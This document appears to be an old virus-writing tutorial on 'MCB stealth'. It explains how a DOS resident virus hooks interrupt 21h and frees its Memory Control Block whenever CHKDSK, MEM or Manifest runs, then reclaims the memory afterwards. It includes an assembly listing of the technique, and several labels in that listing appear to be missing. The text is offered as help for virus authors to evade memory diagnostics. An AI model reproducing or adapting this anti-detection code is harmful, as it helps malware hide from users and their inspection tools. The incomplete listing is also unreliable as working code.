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MCB Stealth
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If you don't know anything about direct memory allocation, Memory Control
Blocks (MCB) and Terminate and Stay Resident programming, then this article
might be a bit too advanced for you.
MCB Stealth is used to hide the allocated memory, by releasing the
memory before a known memory diagnostic program is executed. When the
program exits, the newly released memory gets allocated once again.
When a program is executed (function 4B00h), the procedure is as follows:
1. Check if the executed program is a known memory diagnostic program.
2. Find the last Memory Control Block (MCB) in chain.
3. Free the previously allocated memory.
When a program exits (function 4Ch and 31h), the procedure is as follows:
1. Check if the memory is released.
2. Find the last Memory Control Block (MCB) in chain.
3. Allocate the newly freed memory.
I would like to thank Clive Sharp for helping me with the English.
Checking if the executed program is a known memory diagnostic program
There are quite a few ways to check if an executed program is a known memory
diagnostic program, but I've used the following way:
First I open the file, then I get the system File Control Block (FCB) from
the System File Table (function 1220h and 1216h) and then I close the file.
Then I compare the filename (offset 20h) from the system File Control
Block (FCB) against my list of filenames of known memory diagnostic programs.
These files are known memory diagnostic programs:
MFT.EXE Quarterdeck Manifest
Find the last Memory Control Block (MCB) in chain
If a known memory diagnostic program is being executed, then I get the
segment of the first Memory Control Block (MCB) in the chain from Get list of
lists (function 52h), offset -02h. The following is the description of the
Memory Control Block (MCB):
Offset Size Description
00h 1 Block type: 5Ah if last block in chain, otherwise 4Dh
01h 2 PSP segment of owner, 0000h if free, 0008h if belongs to DOS
03h 2 Size of memory block in paragraphs
To find the segment of the last Memory Control Block (MCB) in the chain, I
add the size of memory block in paragraphs (offset 03h) to the current Memory
Control Block (MCB) and increase that by one, then I have the new Memory
Control Block (MCB). Then I determine the block type, to see if the new Memory
Control Block (MCB) is the last in chain, if it isn't I will continue the
process until I find the last Memory Control Block (MCB) in chain.
Free the previously allocated memory
To free the previously allocated memory, I add the size of the previously
allocated memory from the size of memory block in paragraphs (offset 03h) and
then I execute the actual program.
Check if the memory is released
There are quite a few ways to check if the memory is released, I use a
boolean variable, which tells me if the newly released memory has to be
allocated once again. If I have to allocate the newly released memory once
again I find the last Memory Control Block (MCB) in chain, as described above.
Allocate the newly freed memory
To allocate the newly released memory, I subtract the size of the newly
released memory from the size of memory block in paragraphs (offset 03h) and
then I exit the current program.
Final tips and tricks
- You could make sure that the executed memory diagnostic program doesn't
allocate your virus memory, but I don't find that necessary, because there
is hardly any chance of that happening.
- You could create a Memory Control Block (MCB) in front of your virus and
just modify the PSP segment owner (offset 01h).
- Look at the attached example.
;---=<mcbsteal.asm>=-------------------------------------------=<cut here>=---
comment *
MCB stealth example
Code by
To compile the MCB stealth example with Turbo Assembler v 4.0 type:
.model tiny
mov ax,63fdh ; MCB stealth example service
int 21h ; Do it!
cmp ax,bx ; Already resident?
je mcbstea_exit ; Equal? Jump to mcbstea_exit
mov ax,ds
dec ax ; Decrease AX
mov ds,ax ; DS = segment of programs MCB
xor di,di ; Zero DI
cmp byte ptr ds:[di],'Z'
jne mcbstea_exit ; Not last in chain? Jump to mcbst...
sub word ptr ds:[di+03h],(codeend-code+0fh)/10h
sub word ptr ds:[di+12h],(codeend-code+0fh)/10h
mov es,[di+12h] ; ES = first usable program segment
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
cld ; Clear direction flag
mov cx,(codeend-code) ; Move 284 bytes
lea si,code+100h ; SI = offset of code
rep movsb ; Move example to top of memory
mov ds,cx ; DS = segment of interrupt table
lea di,int21addr ; DI = offset of int21addr
mov si,(21h*04h) ; SI = offset of interrupt 21h
movsw ; Get interrupt vector 21h
movsw ; " " " "
mov word ptr ds:[si-04h],offset mcbsteaint21
mov ds:[si-02h],es ; Set interrupt vector 21h
int 20h ; Exit to DOS!
mcbsteaint21 proc near ; Interrupt 21h of MCB stealth exa...
cmp ah,31h ; Terminate and stay resident?
je test_stealth ; Equal? Jump to test_stealth
cmp ah,4b00h ; Load or execute a program?
je open_file ; Equal? Jump to open_file
cmp ah,4ch ; Terminate with return code
je test_stealth ; Equal? Jump to test_stealth
cmp ax,63fdh ; MCB stealth example service?
jne int21exit ; Not equal? Jump to int21exit
mov bx,ax
db 0eah ; Opcode of a jump far
int21addr dd ? ; Address of interrupt 21h
cmp cs:[stealth],00h ; Allocate memory?
je int21exit ; Equal? Jump to int21exit
push ax bx ds es ; Save registers at stack
call findlastmcb
jne dont_allocat ; Not equal? Jump to dont_allocat
not cs:[stealth] ; Don't free the memory
sub word ptr ds:[03h],(codeend-code+0fh)/10h
pop es ds bx ax ; Load registers from stack
jmp int21exit
push ax ; Save AX at stack
mov ax,3d00h ; Open file (read)
pushf ; Save flags at stack
call cs:[int21addr] ; Do it!
jc dont_stealth ; Error? Jump to dont_stealth
push bx cx di si ds es ; Save registers at stack
xchg ax,bx ; Exchange AX with BX
mov ax,1220h ; Get system file table number
int 2fh ; Do it! (multiplex)
push bx ; Save BX at stack
mov ax,1216h ; Get address of system FCB
mov bl,es:[di] ; BL = system file table entry
int 2fh ; Do it! (multiplex)
pop bx ; Load BX from stack
mov ah,3eh ; Close file
pushf ; Save flags at stack
call cs:[int21addr] ; Do it!
push cs ; Save CS at stack
pop ds ; Load DS at stack
mov cx,(names_end-names_begin)/0bh
add di,20h ; DI = offset of filename
lea si,names_begin ; SI = offset of names_begin
push cx si di ; Save registers at stack
mov cl,0bh ; Compare 11 bytes
rep cmpsb ; Compare the filenames
pop di si cx ; Load registers from stack
je free_memory ; Equal? Jump to free_memory
add si,0bh ; SI = offset of next filename
loop next_name
jmp dont_free
call findlastmcb
jne dont_free ; Not equal? Jump to dont_free
not cs:[stealth] ; Free the memory
add word ptr ds:[03h],(codeend-code+0fh)/10h
pop es ds si di cx bx ; Save registers at stack
pop ax ; Load AX from stack
jmp int21exit
findlastmcb proc near ; Find last MCB in chain
mov ah,52h ; Get list of lists
int 21h ; Do it!
mov ax,es:[bx-02h] ; DS = segment of first MCB
mov ds,ax ; DS = Memory Control Block (MCB)
cmp byte ptr ds:[00h],'M'
jne last_mcb ; Not equal? Jump to last_mcb
add ax,ds:[03h] ; AX = segment of next MCB
inc ax ; Increase AX
jmp next_mcb
cmp byte ptr ds:[00h],'Z'
ret ; Return!
stealth db ? ; Free the memory
chkdsk db 'CHKDSK EXE' ; DOS Chkdsk
mem db 'MEM EXE' ; DOS Mem
mft db 'MFT EXE' ; Quarterdeck Manifest
end code
;---=<mcbsteal.asm>=-------------------------------------------=<cut here>=---